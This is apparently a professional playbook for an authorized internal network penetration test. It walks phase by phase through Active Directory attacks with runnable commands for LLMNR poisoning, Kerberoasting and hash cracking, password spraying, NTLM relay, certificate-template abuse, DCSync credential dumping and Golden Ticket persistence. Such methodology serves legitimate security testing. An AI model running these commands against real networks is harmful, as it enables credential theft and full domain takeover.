Playbook: Internal Network Penetration Test

Scope: Internal corporate network; assume foothold as domain user (or unauthenticated on LAN) Prerequisites: VPN or physical LAN access; scope document from client; low-priv domain account (ideal) MITRE Coverage: T1046, T1110, T1558.003, T1550.002, T1021, T1078

Objective

Identify exploitable vulnerabilities on the internal network, escalate privileges, and demonstrate impact (domain admin, sensitive data access, lateral movement to key systems).

Steps

Phase 1: Network Discovery

1. Identify your position: ip a, ip route, cat /etc/resolv.conf.
2. ARP scan local subnet: arp-scan -l or netdiscover -r 10.10.10.0/24.
3. Find DC(s): nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.local.
4. Port scan all live hosts (top ports first for speed, then -p- on interesting ones):

   nmap -T4 --top-ports 1000 -oA nmap_top1000 10.10.10.0/24
   nmap -p- -sV -sC -T4 -oA nmap_full 10.10.10.1   # DC specifically
   

5. Identify running services: SMB, HTTP/S, RDP, SSH, WinRM, LDAP, MSSQL, etc.

Phase 2: Low-Hanging Fruit

1. Anonymous/null SMB: smbclient -L //dc01 -N, smbmap -H dc01.
2. Default credentials: Common services (SNMP public, web apps, Tomcat tomcat:tomcat).
3. LLMNR/NBT-NS poisoning: Run sudo responder -I eth0 -v in background for 15–30 min.
4. SMB signing check: nxc smb 10.10.10.0/24 --gen-relay-list relay-targets.txt.
5. AS-REP Roasting (no creds needed): GetNPUsers.py domain.local/ -usersfile users.txt -no-pass.

Phase 3: Authenticated Enumeration (with domain account)

1. BloodHound collection:

   bloodhound-python -u user -p pass -d domain.local -dc dc01.domain.local -c All
   

2. Kerberoasting:

   GetUserSPNs.py domain.local/user:pass -dc-ip dc01 -request -outputfile krb.txt
   hashcat -m 13100 krb.txt /usr/share/wordlists/rockyou.txt
   

3. Enumerate users, groups, GPOs, shares:

   nxc smb dc01 -u user -p pass --users
   nxc smb 10.10.10.0/24 -u user -p pass --shares
   ldapdomaindump -u 'domain\user' -p pass dc01
   

4. Enumerate local admins on all hosts:

   nxc smb 10.10.10.0/24 -u user -p pass --local-groups Administrators
   

Phase 4: Credential Attacks

1. Password spraying (careful with lockout threshold):

   nxc smb dc01 -u users.txt -p 'Password123!' --continue-on-success
   nxc smb dc01 -u users.txt -p 'Summer2024!'
   

2. Crack any captured hashes (Responder, Kerberoast, AS-REP).
3. NTLM relay if signing disabled:

   ntlmrelayx.py -tf relay-targets.txt -smb2support -i
   

Phase 5: Privilege Escalation

1. Review BloodHound for attack paths from owned accounts to DA.
2. Exploit ACL misconfigurations (GenericAll, WriteDACL, ForceChangePassword).
3. Check for vulnerable services, token abuse on compromised hosts.
4. ADCS attacks if Certificate Services is present:

   certipy find -u user@domain.local -p pass -dc-ip dc01
   certipy req -u user@domain.local -p pass -ca ca-server -template VulnerableTemplate
   

Phase 6: Domain Compromise

1. DCSync (if DA or DCSync rights):

   secretsdump.py domain/da_user:pass@dc01.domain.local
   

2. Dump KRBTGT hash → create Golden Ticket (persistence / full domain control).
3. Access critical systems: file servers, databases, email.
4. Demonstrate impact: read sensitive data, show access to crown jewels.

Cleanup / Deconfliction

• Remove any uploaded payloads or persistence mechanisms.
• Clear Responder logs (contain sensitive hashes).
• Notify client POC of any high-risk findings immediately (e.g., clear-text credentials discovered).
• Keep timestamped activity log throughout for report.

Notes & Gotchas

• Check domain password lockout policy before spraying: nxc smb dc01 -u user -p pass --pass-pol.
• SMB relay fails if target has SMB signing enabled — always check first.
• BloodHound collection with -c All is noisy; use -c DCOnly if stealth matters.
• ADCS is present in ~90% of enterprise environments and often misconfigured.